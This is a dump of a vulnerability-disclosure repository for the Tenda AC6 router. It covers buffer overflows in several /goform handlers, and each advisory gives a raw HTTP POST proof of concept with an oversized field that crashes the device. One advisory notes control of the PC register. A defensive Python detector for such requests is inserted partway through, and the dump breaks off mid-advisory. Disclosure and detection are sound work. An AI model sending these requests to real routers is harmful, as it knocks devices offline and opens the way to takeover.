/tenda_ac6/formSetClientState_limitSpeed/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/03.png 
--------------------------------------------------------------------------------
/tenda_ac6/formSetClientState_limitSpeedUp/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetClientState_limitSpeedUp/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetClientState_limitSpeedUp/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetDeviceName/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetDeviceName/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetDeviceName/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetDeviceName/images/04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/04.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetFirewallCfg/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetFirewallCfg/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetFirewallCfg/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/formSetMacFilterCfg.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 formSetMacFilterCfg buffer overflow vulnerability

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/formSetMacFilterCfg` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/formSetMacFilterCfg` page. The details are shown below:

![image-20221118102311680](images/02.png)

![image-20221118110536129](images/07.png)

![image-20221118105153664](images/05.png)

![image-20221118104935990](images/04.png)

Using 144 bytes of `A` as padding, we can control the PC register:

![image-20221118110047143](images/06.png)

## POC

This POC can result in a DoS.

```
POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 182
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=eeg1qw
Connection: close

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11
```

![image-20221118103155735](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/04.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/05.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/06.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetMacFilterCfg/images/07.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/07.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_endIp/formSetPPTPServer_endIp.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the endIp parameter in the formSetPPTPServer function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/SetPptpServerCfg` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetPptpServerCfg` page. The details are shown below:

![image-20221119210120477](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 1114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

endIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&startIp=192.168.1.1
```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_endIp/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_endIp/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_endIp/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_startIp/formSetPPTPServer_startIp.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the startIp parameter in the formSetPPTPServer function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/SetPptpServerCfg` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetPptpServerCfg` page. The details are shown below:

![image-20221119210120477](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 1114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

startIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&endIp=192.168.1.1
```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_startIp/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_startIp/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetPPTPServer_startIp/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetQosBand/formSetQosBand.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetQosBand function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/SetNetControlList` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetNetControlList` page. The details are shown below:

![image-20221119203540103](images/02.png)

Call to `sub_7D6D0`:

![image-20221119203704117](images/04.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.204.133
Content-Length: 1157
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/formSetQosBand/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetQosBand/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/02.png
--------------------------------------------------------------------------------
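Every PoC in this collection has the same shape: a POST to a `/goform/` handler whose body carries one form field far longer than the handler's fixed-size buffer. The check below is an added example, not code from the CVE-vulns repository or from Tenda's firmware: it parses a raw HTTP request in the form shown in these write-ups and flags any form field on a `/goform/` path whose decoded value exceeds a byte cap, the rule a reverse proxy or IDS in front of a management interface would apply. The endpoint/parameter pairs are the ones these advisories name; the 128-byte cap, the `oversized-param` label for handlers not on that list, and the two sample requests are assumptions constructed for the demo. It generalizes beyond the documented cases by applying the same length rule to every `/goform/` parameter, so the same bug class in an undocumented handler is still reported.

```python
from urllib.parse import parse_qsl

# Endpoint -> form parameters the advisories in this repository name as
# overflowable (all taken from the page).
WATCHED_PARAMS = {
    "/goform/setMacFilterCfg": {"deviceList"},
    "/goform/SetPptpServerCfg": {"startIp", "endIp"},
    "/goform/SetNetControlList": {"list"},
    "/goform/SetVirtualServerCfg": {"list"},
    "/goform/fast_setting_wifi_set": {"ssid", "timeZone"},
    "/goform/addressNat": {"page"},
}

# Assumed cap (not from the page): well below the 144 bytes of padding the
# formSetMacFilterCfg PoC needs to reach the saved return address, and well
# above any legitimate MAC address, IP address, SSID or time zone string.
MAX_PARAM_LEN = 128


def parse_http_request(raw):
    """Split a raw HTTP request into (method, path, headers, body).

    Accepts CRLF or bare LF line endings. Header names are lower-cased; the
    query string is dropped from the path. Returns None if the request line
    does not have the three expected fields."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3:
        return None
    method, target, _version = request_line
    path = target.split("?", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_oversized_params(raw, limit=MAX_PARAM_LEN):
    """Return (path, param, byte_length, label) for every urlencoded form
    field on a /goform/ POST whose decoded value is longer than `limit`.

    label is "known-overflow-param" when the advisories name that
    endpoint/parameter pair and "oversized-param" otherwise. Only POST
    bodies are inspected: the PoCs all deliver the payload that way."""
    parsed = parse_http_request(raw)
    if parsed is None:
        return []
    method, path, headers, body = parsed
    if method != "POST" or not path.startswith("/goform/"):
        return []
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    findings = []
    # keep_blank_values so an empty field still counts as present
    for name, value in parse_qsl(body.strip(), keep_blank_values=True):
        size = len(value.encode("utf-8"))
        if size <= limit:
            continue
        if name in WATCHED_PARAMS.get(path, set()):
            label = "known-overflow-param"
        else:
            label = "oversized-param"
        findings.append((path, name, size, label))
    return findings


# Constructed sample modelled on the formSetMacFilterCfg PoC: 144 bytes of
# padding followed by the four bytes that the write-up shows landing in PC.
POC_LIKE_REQUEST = (
    "POST /goform/setMacFilterCfg HTTP/1.1\r\n"
    "Host: 192.168.204.133\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    "macFilterType=black&deviceList=" + "A" * 144 + "BBBB"
)

# Constructed benign request to the same handler: a single MAC address.
BENIGN_REQUEST = (
    "POST /goform/setMacFilterCfg HTTP/1.1\r\n"
    "Host: 192.168.204.133\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
    "macFilterType=black&deviceList=00:11:22:33:44:55"
)

if __name__ == "__main__":
    for req in (POC_LIKE_REQUEST, BENIGN_REQUEST):
        print(find_oversized_params(req))
```

The byte length is measured after URL decoding, which is what the handler sees once `httpd` has unescaped the field; measuring the raw encoded length would let a percent-encoded payload slip under the cap. A cap this low will occasionally flag a legitimately long `list` field on the QoS or virtual-server pages, so in practice the threshold is tuned per endpoint against the device's own UI traffic rather than set globally.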
/tenda_ac6/formSetQosBand/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetQosBand/images/04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/04.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetSpeedWan/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetSpeedWan/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetSpeedWan/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetVirtualSer/formSetVirtualSer.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetVirtualSer function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/SetVirtualServerCfg` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetVirtualServerCfg` page. The details are shown below:

![image-20221119210842685](images/02.png)

In `sub_76068`:

![image-20221119210941319](images/04.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 1093
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/formSetVirtualSer/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetVirtualSer/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetVirtualSer/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/formSetVirtualSer/images/04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/04.png
--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_ssid/form_fast_setting_wifi_set_ssid.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/fast_setting_wifi_set` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

